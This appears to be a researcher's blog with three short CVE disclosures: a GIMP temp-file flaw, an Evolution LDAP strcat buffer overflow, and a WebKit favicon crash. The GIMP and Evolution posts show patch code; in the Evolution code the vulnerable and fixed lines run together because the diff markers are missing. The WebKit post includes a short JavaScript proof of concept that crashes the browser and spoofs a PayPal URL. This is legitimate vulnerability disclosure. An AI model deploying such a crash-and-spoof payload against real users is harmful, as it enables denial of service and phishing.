Pageviews

Sunday, 24 June 2018

Insecure Permissions in GIMP - CVE-2018-12713

Hi Internet,

#ShortPost

Summary: GIMP through 2.10.2 makes g_get_tmp_dir calls to establish temporary filenames, which may result in a filename that already exists, as demonstrated by the gimp_write_and_read_file function in app/tests/test-xcf.c. This might be leveraged by attackers to overwrite files or read file content that was intended to be private.
Img Src: https://www.gimp.org/

While having a look on GIMP code I observed that,
File test-xcf.cat#L314  which was;
filename = g_build_filename (g_get_tmp_dir (), "gimp-test.xcf", NULL);
The function with 'getenv("TMP")';it returns untrustable input. This issue was reported to GNOME GIMP team and a patch was pushed.

   GimpImage           *image;
   GimpImage           *loaded_image;
   GimpPlugInProcedure *proc;
-  gchar               *filename;
+  gchar               *filename = NULL;
+  gint                 file_handle;
   GFile               *file;
 
   /* Create the image */
@@ -311,7 +312,9 @@ gimp_write_and_read_file (Gimp     *gimp,
                          use_gimp_2_8_features);
 
   /* Write to file */
-  filename = g_build_filename (g_get_tmp_dir (), "gimp-test.xcf", NULL);
+  file_handle = g_file_open_tmp ("gimp-test-XXXXXX.xcf", &filename, NULL);
+  g_assert (file_handle != -1);
+  close (file_handle);
   file = g_file_new_for_path (filename);
   g_free (filename);
Not sure this is really solving the issue reported, which is that `g_get_tmp_dir()` uses environment variables (yet as g_file_open_tmp() uses g_get_tmp_dir()…). But at least g_file_open_tmp() should create unique temporary files, which prevents overriding existing files (which is most likely the only real attack possible here, or at least the only one I can think of unless some weird vulnerabilities exist in glib) CVE-2018-12713 was assigned to this issue.


Regards
Dhiraj

Friday, 15 June 2018

bufferoverflow() in evolution - CVE-2018-12422

Hi Internet,

#ShortPost

Evolution is a personal information management application that provides integrated mail, calendaring and address book functionality.

While going through the source code of GNOME evolution we observed that,

`addressbook/backends/ldap/e-book-backend-ldap.c` in Evolution-Data-Server in GNOME Evolution through 3.29.2 might allow attackers to trigger a Buffer Overflow via a long query that is processed by the `strcat ` function, CVE-2018-12422 was assigned to this issue.

We reported this to GNOME Evolution team and a patch was pushed for same, below code for your reference.

		if (!strcmp (propname, "x-evolution-any-field")) {
			gint i;
			gint query_length;
			gchar *big_query;
			GString *big_query;
			gchar *match_str;
			if (one_star) {
				g_free (str);

			match_str = g_strdup_printf ("=*%s*)", str);

			query_length = 3; /* strlen ("(|") + strlen (")") */

			for (i = 0; i < G_N_ELEMENTS (prop_info); i++) {
				query_length += 1 /* strlen ("(") */ + strlen (prop_info[i].ldap_attr) + strlen (match_str);
			}

			big_query = g_malloc0 (query_length + 1);
			strcat (big_query, "(|");
			big_query = g_string_sized_new (G_N_ELEMENTS (prop_info) * 7);
			g_string_append (big_query, "(|");
			for (i = 0; i < G_N_ELEMENTS (prop_info); i++) {
				if ((prop_info[i].prop_type & PROP_TYPE_STRING) != 0 &&
				    !(prop_info[i].prop_type & PROP_WRITE_ONLY) &&
				     !(prop_info[i].prop_type & PROP_EVOLVE)) &&
				    (ldap_data->bl->priv->calEntrySupported ||
				     !(prop_info[i].prop_type & PROP_CALENTRY))) {
					strcat (big_query, "(");
					strcat (big_query, prop_info[i].ldap_attr);
					strcat (big_query, match_str);
					g_string_append (big_query, "(");
					g_string_append (big_query, prop_info[i].ldap_attr);
					g_string_append (big_query, match_str);
				}
			}
			strcat (big_query, ")");
			g_string_append (big_query, ")");

			ldap_data->list = g_list_prepend (ldap_data->list, big_query);
			ldap_data->list = g_list_prepend (ldap_data->list, g_string_free (big_query, FALSE));

			g_free (match_str);
		}

		if (!strcmp (propname, "x-evolution-any-field")) {
			gint i;
			gint query_length;
			gchar *big_query;
			GString *big_query;
			gchar *match_str;

			match_str = g_strdup ("=*)");

			query_length = 3; /* strlen ("(|") + strlen (")") */

			for (i = 0; i < G_N_ELEMENTS (prop_info); i++) {
				query_length += 1 /* strlen ("(") */ + strlen (prop_info[i].ldap_attr) + strlen (match_str);
			}

			big_query = g_malloc0 (query_length + 1);
			strcat (big_query, "(|");
			big_query = g_string_sized_new (G_N_ELEMENTS (prop_info) * 7);
			g_string_append (big_query, "(|");
			for (i = 0; i < G_N_ELEMENTS (prop_info); i++) {
				if (!(prop_info[i].prop_type & PROP_WRITE_ONLY) &&
				    (ldap_data->bl->priv->evolutionPersonSupported ||
				     !(prop_info[i].prop_type & PROP_EVOLVE)) &&
				    (ldap_data->bl->priv->calEntrySupported ||
				     !(prop_info[i].prop_type & PROP_CALENTRY))) {
					strcat (big_query, "(");
					strcat (big_query, prop_info[i].ldap_attr);
					strcat (big_query, match_str);
					g_string_append (big_query, "(");
					g_string_append (big_query, prop_info[i].ldap_attr);
					g_string_append (big_query, match_str);
				}
			}
			strcat (big_query, ")");
			g_string_append (big_query, ")");

			ldap_data->list = g_list_prepend (ldap_data->list, big_query);
			ldap_data->list = g_list_prepend (ldap_data->list, g_string_free (big_query, FALSE));

			g_free (match_str);
		}

Source : https://gitlab.gnome.org/GNOME/evolution-data-server/commit/34bad61738e2127736947ac50e0c7969cc944972?view=inline

Mention's:
A shoutout to Zubin and Hardik we work together to find security bugs, Hope you like the read.


Regards
Dhiraj

Friday, 1 June 2018

WebKit crashes when pageURL is unset - CVE-2018-11646

Hi Internet,

This bug is continuation of CVE-2018-11396 - BFuzz.

Summary:
webkitFaviconDatabaseSetIconURLForPageURL in UIProcess/AP/glib/WebKitFaviconDatabase.cpp in WebKit, as distributed in Safari Technology Preview Release 57, mishandles an unset pageURL, leading to an application crash.

PoC:
win = window.open("sleep_one_second.php", "WIN"); 
window.open("https://www.paypal.com", "WIN");  
win.document.execCommand('Stop');              
win.document.write("Spoofed URL");   
win.document.close();
After the patch of CVE-2018-11396 in Epiphany web browser with PoC still browser was getting crash using above JS. Unfortunately the gdb crash makes it impossible to get a full trace, so it was  hard to know for sure if this is an Epiphany bug or a WebKit bug and epiphany team started investigating the same.

Below is the backtrace using Fedora 27.
#0 WTF::StringImpl::rawHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 508
#1 WTF::StringImpl::hasHash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 514
#2 WTF::StringImpl::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringImpl.h line 525
#3 WTF::StringHash::hash
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/text/StringHash.h line 73
#9 WTF::HashMap, WTF::HashTraits >::get
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/HashMap.h line 406
#10 webkitFaviconDatabaseSetIconURLForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 193
#11 webkitFaviconDatabaseSetIconForPageURL
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitFaviconDatabase.cpp line 318
#12 webkitWebViewSetIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/API/glib/WebKitWebView.cpp line 1964
#13 WTF::Function::performCallbackWithReturnValue
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/GenericCallback.h line 108
#15 WebKit::WebPageProxy::dataCallback
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 5083
#16 WebKit::WebPageProxy::finishedLoadingIcon
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WebKit/UIProcess/WebPageProxy.cpp line 6848
#17 IPC::callMemberFunctionImpl::operator()
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 68
#29 WTF::RunLoop::::_FUN(gpointer)
at /usr/src/debug/webkitgtk4-2.18.0-2.fc27.x86_64/Source/WTF/wtf/glib/RunLoopGLib.cpp line 70
#30 g_main_dispatch
at gmain.c line 3148
#31 g_main_context_dispatch
at gmain.c line 3813
#32 g_main_context_iterate
at gmain.c line 3886
#33 g_main_context_iteration
at gmain.c line 3947
#34 g_application_run
at gapplication.c line 2401
#35 main
at ../src/ephy-main.c line 432 
Two similar reproducers triggered two different crashes. We concluded that this crash is from WebKit (Crash in WebKitFaviconDatabase when pageURL is unset) and bug was file for same and CVE-2018-11646 was assigned to this issue.

Mention's:
A shoutout to Zubin and Hardik (Teamw00t) we work together to find security bugs, Hope you like the read.


Regards
Dhiraj (Teamw00t)